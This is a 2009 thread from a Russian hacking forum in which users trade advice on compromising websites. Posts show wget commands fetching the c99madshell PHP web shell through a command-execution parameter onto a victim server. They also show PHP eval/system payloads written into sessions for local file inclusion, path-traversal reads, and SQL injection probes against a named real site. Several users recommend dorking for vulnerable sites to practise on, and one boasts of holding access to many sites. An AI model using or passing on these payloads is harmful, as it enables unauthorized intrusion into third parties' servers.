01.12.2009, 01:19
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от Grey
Сразу видно ты команду ниразу не юзал:
Код:
wget http://ya.ru/index.html -o 1.txt - поместит лог работы в 1.txt
wget http://ya.ru/index.html -O 1.txt - сохранит файл в 1.txt
правильно?
wget http://site.ru/shell.txt -O http://www.motorama.be/shell.php
где www.motorama.be/shell.php сайт куда надо загрузить шелл...
а wget http://site.ru/shell.txt
сайт где лежит код шелла...
Последний раз редактировалось 547; 01.12.2009 в 01:21..
|
|
|
01.12.2009, 01:27
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами:
9679872
Репутация:
347
|
|
Сообщение от 547
правильно?
wget http://site.ru/shell.txt -O http://www.motorama.be/shell.php
где www.motorama.be/shell.php сайт куда надо загрузить шелл...
а wget http://site.ru/shell.txt
сайт где лежит код шелла...
неправильно.
для того чтобы это было правильным, у программы wget должны были бы быть следующие возможности:
- определяет что за веб-сервер установлен
- ищет его конфиги
- находит в конфигах полный путь к директории сервера
- вычисляет куда, наконец, сохранить этот злополучный shell.php
- сохраняет его туда
Вам не кажется что это многовато для простой утилиты?
|
|
|
|
01.12.2009, 01:39
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от bons
неправильно.
для того чтобы это было правильным, у программы wget должны были бы быть следующие возможности:
- определяет что за веб-сервер установлен
- ищет его конфиги
- находит в конфигах полный путь к директории сервера
- вычисляет куда, наконец, сохранить этот злополучный shell.php
- сохраняет его туда
Вам не кажется что это многовато для простой утилиты?
Мда уж... И зачем умничать? Это по-детски как-то. Честно, как ребенок говоришь...
547, я тебе уже в личке объяснял, еще раз напишу полный и рабочий пример использования wget
Код:
wget http://madnet.name/files/download/9_c99madshell.php -O c99madshell.php
В даном случае wget скачает файл, который находится по адресу http://madnet.name/files/download/9_c99madshell.php в файл c99madshell.php, который будет находится в текущей директории, т.е. в директории с которой был запущен wget. Если необходимо загрузить в отличную от текущей директорию, достаточно вместо c99madshell.php написать полный путь к файлу, н.п.
Код:
/var/www/images/smiles/smile.php
А вообще, читай
http://linux.about.com/od/commands/l/blcmdl1_wget.htm
|
|
|
|
01.12.2009, 19:28
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от wkar
http://site/cmd.php?cmd=wget http://madnet.name/files/download/9_c99madshell.php -O shell.php
http://site/cmd.php?cmd='wget http://madnet.name/files/download/9_c99madshell.php -O shell.php'
Не пишет в файл. Команда дир пашет.
помоему вгета нет в винде =)))
юзай фтп.
Последний раз редактировалось p.r0phe.t; 01.12.2009 в 19:32..
|
|
|
|
05.12.2009, 18:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от L I G A
2mailbrush
Код:
UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
у него в запрос станет:
Код:
`text` = 'concat_ws(0x3a,user(),database(),version())/*' ...
И в тексте новости будет:
concat_ws(0x3a,user(),database(),version())/*
Почему у него в запрос должны стать кавычки? Откуда они взялись там?
|
|
|
|
22.12.2009, 14:42
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от Pashkela
т.е. если я правильно понял, то просто набрав в урле-жертвы php-код и проинклудив сессию из /tmp можно получить шелл? Спасибо, революционный способ детектед
Чел просто слышал звон но не знет где он.
Если параметр page пишется в сессию, то достаточно вот этого:
Код:
page=<? eval($_REQUEST['cmd']); ?>
Ну и потом инклудить сессию. А лабуда с etc/passwd тут вообще не при чём.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
22.12.2009, 14:37
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от 547
ну поздравляю с просветлением тебя 
m0Hze
удивляюсь што ты про такое незнал...
ну как это причем...
именно через подключение твоей сессии которая лежит в тмп выполняеется код шелла page=../../../../../../etc/passwd%00<? system($_GET['cmd']); ?>
Что ты хотел этм сказать? Каким образом строка из гет,попадет в сессию? Причом тут инклуд вообще,если ты хочеш просто вписат ьв сессию данные.Ты либо путаеш логи апача с сессиями,либо я вообще ниразу не знаю php :/
|
|
|
|
22.12.2009, 21:21
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от jecka3000
после того, как мне Пашкела показал метод "читалок" (http://moysait/hotd2.php?id=../../../../../../../../home/chobot/moysait/www/inc/my.php) стало интересно разобраться в самой сути, а также появилось несколько вопросов (Pashkela, если ты в лс не отвечаешь, мож тут хоть ответишь))
1.Есть ли специальный софт для составления запросов "читалок"?
2. Как определить, когда можно составить такой запрос, а когда нет?
3. И собственно говоря, какой принцип составления такого запроса?
Для ответа на все эти вопросы нужно понимать общий принцип работы скрипта. Какие переменные как формируются, куда и как подставлятся, примерные фильтры итд. Для этого нужно смотреть и анализировать коды. Разберёшься в этом - будет тебе счастье. Не разберёшься - можешь забить и искать "специальные программы" аля хакер интернета.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
29.12.2009, 06:35
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
С нами:
8943448
Репутация:
127
|
|
Сообщение от v1d0qz
YuNi|[c
Просто видимо там ничего нету.
Я вот тоже решил первый раз выложить свой вопрос по иньекции.
h_ttp://www.dr service.ru/'
Никак немогу подобрать правильный запрос.
ну или тут
h_ttp://www.dr service.ru/service-centers/nn/NNovgorod/drservice52'/
это что за ужас? так низя
я прсмотрел сайт по-моему там врядли гдето можно внедрить инъекцию. может кто поопытнее что-то найдет
в гугле набери: inurl:index.php?id=1 и подставляй в каждой ссылке кавычку для тренировки
|
|
|
|
29.12.2009, 06:48
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Сообщение от Bramin
это что за ужас? так низя
я прсмотрел сайт по-моему там врядли гдето можно внедрить инъекцию. может кто поопытнее что-то найдет
в гугле набери: inurl:index.php?id=1 и подставляй в каждой ссылке кавычку для тренировки
Ну если не знаешь, то зачем писать?
Для тренировки я использую методы по интересней А вообще то у меня уже свалка доступа к сайтам с посещаемостью не 1к уников в сутки))
Просто вопросы я чаще всего решаю сам, чем пишу на форуме, а крутить простые скули типа как ты говоришь inurl:index.php?id=1, не очень интересно.
зы. Для меня интерес в выведении допустим того же database(), а не сидеть перебирать таблички и смотреть что в них. Перебирать таблички уже с построенного запроса, это вообще практически ничему не учит. Так что, вот так вот
Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1+1='2/
Почему же не выводиться допустим когда вставляем version или другую подобную функцию.
http://www.dr service.ru/service-centers/nn/NNovgorod/drservice52/'and+substr ing(version(),1,1)='5/
Видимо потому что 6 утра и нужно спать)) Бо что-то уже совсем ничего не выводиться )))
Последний раз редактировалось v1d0qz; 29.12.2009 в 18:54..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
